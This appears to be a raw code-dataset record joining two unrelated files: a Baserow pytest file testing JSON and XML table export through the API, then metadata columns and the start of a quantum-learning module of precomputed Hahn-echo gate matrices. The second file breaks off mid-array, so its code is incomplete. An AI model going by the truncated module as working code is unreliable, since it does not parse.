premium/backend/tests/baserow_premium/api/export/test_premium_export_views.py
|
lucastm/baserow
|
c5fd45b75c753cc5dfd3227902a79535fbe5ad0f
|
[
"MIT"
] | 28
|
2020-08-07T09:23:58.000Z
|
2022-03-01T22:32:40.000Z
|
premium/backend/tests/baserow_premium/api/export/test_premium_export_views.py
|
lucastm/baserow
|
c5fd45b75c753cc5dfd3227902a79535fbe5ad0f
|
[
"MIT"
] | 79
|
2020-08-04T01:48:01.000Z
|
2022-03-27T13:30:54.000Z
|
from unittest.mock import patch
import pytest
from django.core.files.storage import FileSystemStorage
from django.urls import reverse
from django.utils.dateparse import parse_datetime
from django.utils.timezone import utc, make_aware
from freezegun import freeze_time
from rest_framework.fields import DateTimeField
from baserow.contrib.database.rows.handler import RowHandler
@pytest.mark.django_db
def test_exporting_json_writes_file_to_storage(
data_fixture, api_client, tmpdir, settings, django_capture_on_commit_callbacks
):
user, token = data_fixture.create_user_and_token()
table = data_fixture.create_database_table(user=user)
text_field = data_fixture.create_text_field(table=table, name="text_field", order=0)
option_field = data_fixture.create_single_select_field(
table=table, name="option_field", order=1
)
option_a = data_fixture.create_select_option(
field=option_field, value="A", color="blue"
)
option_b = data_fixture.create_select_option(
field=option_field, value="B", color="red"
)
date_field = data_fixture.create_date_field(
table=table,
date_include_time=True,
date_format="US",
name="date_field",
order=2,
)
grid_view = data_fixture.create_grid_view(table=table)
data_fixture.create_view_filter(
view=grid_view, field=text_field, type="contains", value="test"
)
data_fixture.create_view_sort(view=grid_view, field=text_field, order="ASC")
row_handler = RowHandler()
row_handler.create_row(
user=user,
table=table,
values={
text_field.id: "test",
date_field.id: "2020-02-01 01:23",
option_field.id: option_b.id,
},
)
row_handler.create_row(
user=user,
table=table,
values={
text_field.id: "atest",
date_field.id: "2020-02-01 01:23",
option_field.id: option_a.id,
},
)
storage = FileSystemStorage(location=(str(tmpdir)), base_url="http://localhost")
with patch("baserow.contrib.database.export.handler.default_storage", new=storage):
run_time = make_aware(parse_datetime("2020-02-01 01:00"), timezone=utc)
expected_created_at = DateTimeField().to_representation(run_time)
with freeze_time(run_time):
with django_capture_on_commit_callbacks(execute=True):
response = api_client.post(
reverse(
"api:database:export:export_table",
kwargs={"table_id": table.id},
),
data={
"view_id": grid_view.id,
"exporter_type": "json",
"json_charset": "utf-8",
},
format="json",
HTTP_AUTHORIZATION=f"JWT {token}",
)
response_json = response.json()
assert "id" in response_json
job_id = response_json["id"]
assert response_json == {
"id": job_id,
"created_at": expected_created_at,
"exported_file_name": None,
"exporter_type": "json",
"progress_percentage": 0.0,
"status": "pending",
"table": table.id,
"view": grid_view.id,
"url": None,
}
response = api_client.get(
reverse("api:database:export:get", kwargs={"job_id": job_id}),
format="json",
HTTP_AUTHORIZATION=f"JWT {token}",
)
response_json = response.json()
assert "exported_file_name" in response_json
filename = response_json["exported_file_name"]
assert response_json == {
"id": job_id,
"created_at": expected_created_at,
"exported_file_name": filename,
"exporter_type": "json",
"progress_percentage": 1.0,
"status": "complete",
"table": table.id,
"view": grid_view.id,
"url": f"http://localhost:8000/media/export_files/{filename}",
}
file_path = tmpdir.join(settings.EXPORT_FILES_DIRECTORY, filename)
assert file_path.isfile()
expected = """[
{
"id": 2,
"text_field": "atest",
"option_field": "A",
"date_field": "02/01/2020 01:23"
},
{
"id": 1,
"text_field": "test",
"option_field": "B",
"date_field": "02/01/2020 01:23"
}
]
"""
with open(file_path, "r", encoding="utf-8") as written_file:
real = written_file.read()
assert real == expected
@pytest.mark.django_db
def test_exporting_xml_writes_file_to_storage(
data_fixture, api_client, tmpdir, settings, django_capture_on_commit_callbacks
):
user, token = data_fixture.create_user_and_token()
table = data_fixture.create_database_table(user=user)
text_field = data_fixture.create_text_field(table=table, name="text_field", order=0)
option_field = data_fixture.create_single_select_field(
table=table, name="option_field", order=1
)
option_a = data_fixture.create_select_option(
field=option_field, value="A", color="blue"
)
option_b = data_fixture.create_select_option(
field=option_field, value="B", color="red"
)
date_field = data_fixture.create_date_field(
table=table,
date_include_time=True,
date_format="US",
name="date_field",
order=2,
)
grid_view = data_fixture.create_grid_view(table=table)
data_fixture.create_view_filter(
view=grid_view, field=text_field, type="contains", value="test"
)
data_fixture.create_view_sort(view=grid_view, field=text_field, order="ASC")
row_handler = RowHandler()
row_handler.create_row(
user=user,
table=table,
values={
text_field.id: "test",
date_field.id: "2020-02-01 01:23",
option_field.id: option_b.id,
},
)
row_handler.create_row(
user=user,
table=table,
values={
text_field.id: "atest",
date_field.id: "2020-02-01 01:23",
option_field.id: option_a.id,
},
)
storage = FileSystemStorage(location=(str(tmpdir)), base_url="http://localhost")
with patch("baserow.contrib.database.export.handler.default_storage", new=storage):
run_time = make_aware(parse_datetime("2020-02-01 01:00"), timezone=utc)
with freeze_time(run_time):
expected_created_at = DateTimeField().to_representation(run_time)
with django_capture_on_commit_callbacks(execute=True):
response = api_client.post(
reverse(
"api:database:export:export_table",
kwargs={"table_id": table.id},
),
data={
"view_id": grid_view.id,
"exporter_type": "xml",
"xml_charset": "utf-8",
},
format="json",
HTTP_AUTHORIZATION=f"JWT {token}",
)
response_json = response.json()
assert "id" in response_json
job_id = response_json["id"]
assert response_json == {
"id": job_id,
"created_at": expected_created_at,
"exported_file_name": None,
"exporter_type": "xml",
"progress_percentage": 0.0,
"status": "pending",
"table": table.id,
"view": grid_view.id,
"url": None,
}
response = api_client.get(
reverse("api:database:export:get", kwargs={"job_id": job_id}),
format="json",
HTTP_AUTHORIZATION=f"JWT {token}",
)
response_json = response.json()
assert "exported_file_name" in response_json
filename = response_json["exported_file_name"]
assert response_json == {
"id": job_id,
"created_at": expected_created_at,
"exported_file_name": filename,
"exporter_type": "xml",
"progress_percentage": 1.0,
"status": "complete",
"table": table.id,
"view": grid_view.id,
"url": f"http://localhost:8000/media/export_files/{filename}",
}
file_path = tmpdir.join(settings.EXPORT_FILES_DIRECTORY, filename)
assert file_path.isfile()
expected = """<?xml version="1.0" encoding="utf-8" ?>
<rows>
<row>
<id>2</id>
<text-field>atest</text-field>
<option-field>A</option-field>
<date-field>02/01/2020 01:23</date-field>
</row>
<row>
<id>1</id>
<text-field>test</text-field>
<option-field>B</option-field>
<date-field>02/01/2020 01:23</date-field>
</row>
</rows>
"""
with open(file_path, "r", encoding="utf-8") as written_file:
xml = written_file.read()
assert strip_indents_and_newlines(xml) == strip_indents_and_newlines(
expected
)
def strip_indents_and_newlines(xml):
return "".join([line.strip() for line in xml.split("\n")])
| 35.568773
| 88
| 0.569293
| 1,078
| 9,568
| 4.7718
| 0.144712
| 0.047045
| 0.066096
| 0.025661
| 0.873639
| 0.854782
| 0.854782
| 0.833398
| 0.833398
| 0.813375
| 0
| 0.02332
| 0.314277
| 9,568
| 268
| 89
| 35.701493
| 0.760707
| 0
| 0
| 0.722222
| 0
| 0
| 0.184783
| 0.040029
| 0
| 0
| 0
| 0
| 0.047619
| 1
| 0.011905
| false
| 0
| 0.035714
| 0.003968
| 0.051587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0788b477045d6b36b5e0a953e4af2405b20c6bba
| 349,884
|
py
|
Python
|
qmla/shared_functionality/hahn_inversion_gates.py
|
Evan1415/QMLA
|
4521f7c08456a4494aed7c1b78d8ded5ea40f3d8
|
[
"MIT"
] | null | null | null |
qmla/shared_functionality/hahn_inversion_gates.py
|
Evan1415/QMLA
|
4521f7c08456a4494aed7c1b78d8ded5ea40f3d8
|
[
"MIT"
] | null | null | null |
qmla/shared_functionality/hahn_inversion_gates.py
|
Evan1415/QMLA
|
4521f7c08456a4494aed7c1b78d8ded5ea40f3d8
|
[
"MIT"
] | null | null | null |
r"""
For NV experiment (Bristol, 2019), the same Hahn echo gate is applied many times.
Rather than compute the exponential to find the gate each time,
they are stored here instead.
"""
from numpy import array
precomputed_hahn_z_inversion_gates = {1: array([[0. - 1.j, 0. + 0.j],
[0. + 0.j, 0. + 1.j]]), 2: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]]), 3: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
1.j, 0. +
0.j, 0. +
0.j, 0. +
0.j],
[0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
1.j, 0. +
0.j, 0. +
0.j],
[0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
0.j, 0. +
1.j, 0. +
0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]]), 4: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]]), 5: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
